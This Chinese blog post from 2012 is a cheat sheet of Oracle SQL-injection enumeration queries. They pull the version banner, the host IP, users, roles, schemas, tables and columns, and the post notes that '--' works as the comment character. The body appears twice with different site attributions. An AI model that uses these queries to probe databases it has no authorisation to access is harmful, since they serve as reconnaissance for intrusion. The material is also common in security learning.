Oracle注入简单命令整理 |
发布时间: 2012/8/16 16:28:58 |
第一次碰到Oracle,整理一些简单实用的。 确定orcale 识别--为注释符,不识别# length()为求字符串长度函数,非len() 表 dual: 系统表,只有一个选项 表 all_tables: table_name 表名 owner 所有者,库名
表 all_tab_cols: column_name 列名 data_type 数据类型 查看版本 select banner from sys.v_$version where rownum=1 查看IP以及主机名 select to_char(utl_inaddr.get_host_address) from dual-- select to_char(utl_inaddr.get_host_address) from dual-- 查看用户 select username from all_users 查看角色 select role from session_roles 查看库 select owner from all_tables 查看表 select table_name from all_tables where owner='' 查看列 select column_name from all_tab_cols where table_name='' 其他 一下3个为不同级别,上例中因没有dba权限,故全用all来代替 dba, 数据库管理员 all, 全部用户 user, 当前用户 to_char() 转换为字符窜 BLOB 大对象,属于LOB,二进制数据,如照片等 本文出自:亿恩科技【www.enkj.com】
表 all_tab_cols: column_name 列名 data_type 数据类型 查看版本 select banner from sys.v_$version where rownum=1 查看IP以及主机名 select to_char(utl_inaddr.get_host_address) from dual-- select to_char(utl_inaddr.get_host_address) from dual-- 查看用户 select username from all_users 查看角色 select role from session_roles 查看库 select owner from all_tables 查看表 select table_name from all_tables where owner='' 查看列 select column_name from all_tab_cols where table_name='' 其他 一下3个为不同级别,上例中因没有dba权限,故全用all来代替 dba, 数据库管理员 all, 全部用户 user, 当前用户 to_char() 转换为字符窜 BLOB 大对象,属于LOB,二进制数据,如照片等 本文出自:亿恩科技【www.enidc.com】 --> |